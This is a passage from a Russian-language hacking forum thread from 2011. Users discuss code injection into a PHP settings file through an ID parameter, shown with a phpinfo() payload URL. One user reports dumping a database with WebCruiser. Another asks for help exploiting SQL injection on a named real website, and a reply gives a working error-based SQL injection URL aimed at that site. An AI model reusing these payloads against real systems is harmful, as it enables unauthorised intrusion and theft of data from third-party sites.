ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.10.2011, 19:49
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Boolean
Вообще-то как-такового варианта обхода нет.
Тока что проверял у себя на локал хосте скрипт, если пораметру id присвоить значение, к примеру "", то в файл TEST.PHP, записывается такая информация "log = ''", следовательно так как сам фаел имеет расширение php и в самом нем прописывается теги на выполнение пхп он и выполняется, попробуй у себя протестировать и все поймешь, у себя на локалхосте я делал так:
Сообщение от None
test1.ru/1.php?ID=%3C?%20phpinfo();%20?%3E
P.S.: вот намерено вставил в код кавычку и вот что получилось в файле
Сообщение от None
log = ''
|
|
|
22.10.2011, 21:00
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Сообщение от winstrool
Тока что проверял у себя на локал хосте скрипт, если пораметру id присвоить значение, к примеру "", то в файл TEST.PHP, записывается такая информация "log = ''", следовательно так как сам фаел имеет расширение php и в самом нем прописывается теги на выполнение пхп он и выполняется, попробуй у себя протестировать и все поймешь, у себя на локалхосте я делал так:
P.S.: вот намерено вставил в код кавычку и вот что получилось в файле
а, понял о чем, видимо файл юзается как файл настроек.
т.е. начало идет прямо с log=' ?)
Если да, то круто.
|
|
|
|
22.10.2011, 23:03
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
Сообщение от Boolean
а, понял о чем, видимо файл юзается как файл настроек.
т.е. начало идет прямо с log=' ?)
Если да, то круто.
да файл используеться как хранилище настроек но в виде php массива
и увы теги php находяться в начале файла и недоступны
надежда была только на то что в php есть и другие символы короме кавычки и слеша имеющие особые свойства
|
|
|
|
23.10.2011, 01:49
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от ysmat
да файл используеться как хранилище настроек но в виде php массива
и увы теги php находяться в начале файла и недоступны
надежда была только на то что в php есть и другие символы короме кавычки и слеша имеющие особые свойства
просто записываешь это
.php?ID= и все
|
|
|
|
23.10.2011, 07:35
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от попугай
просто записываешь это
.php?ID= и все
И что выйдет из этого? Значение переменной ID попадут в одинарную кавычку, и PHP интерпретатор будет считать это обычным текстом, а не php кодом.
|
|
|
|
23.10.2011, 10:57
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Expl0ited
И что выйдет из этого? Значение переменной ID попадут в одинарную кавычку, и PHP интерпретатор будет считать это обычным текстом, а не php кодом.
Посмотри код внимательнее, параметр w при открытии файла - соответственно весь файл будет очищен, и создаться файл с текстом:
TEST.PHP:
PHP код:
[COLOR="#000000"]log = '[COLOR="#0000BB"][/COLOR]'[/COLOR]
Ну и открываем файл TEST.PHP в браузере.
|
|
|
|
23.10.2011, 17:00
|
|
Новичок
Регистрация: 04.02.2009
Сообщений: 23
Провел на форуме:
314644
Репутация:
42
|
|
Очень интересует что происходит в данном случае?
WebCruiser`ом сливаю базу, а она, как видно на скрине идет какими-то закорючками)
 |
|
|
|
23.10.2011, 22:47
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
народ помогите разкрутить скулю, не мойму как дальше
http://www.lcoastpress.com/journal.php?id=7'
|
|
|
|
23.10.2011, 22:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от qaz
народ помогите разкрутить скулю, не мойму как дальше
http://www.lcoastpress.com/journal.php?id=7'
http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+vers ion()),floor(rand(0)*2))having+min(0)+or+1--+
|
|
|
|
23.10.2011, 23:14
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Konqi
http://www.lcoastpress.com/journal.php?id=7+or+1+group+by+concat((select+vers ion()),floor(rand(0)*2))having+min(0)+or+1--+
я понимаю значение етих команд, но не понимаю как и почему такое их скопление работает , хто может обьяснить или где я могу почитать?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
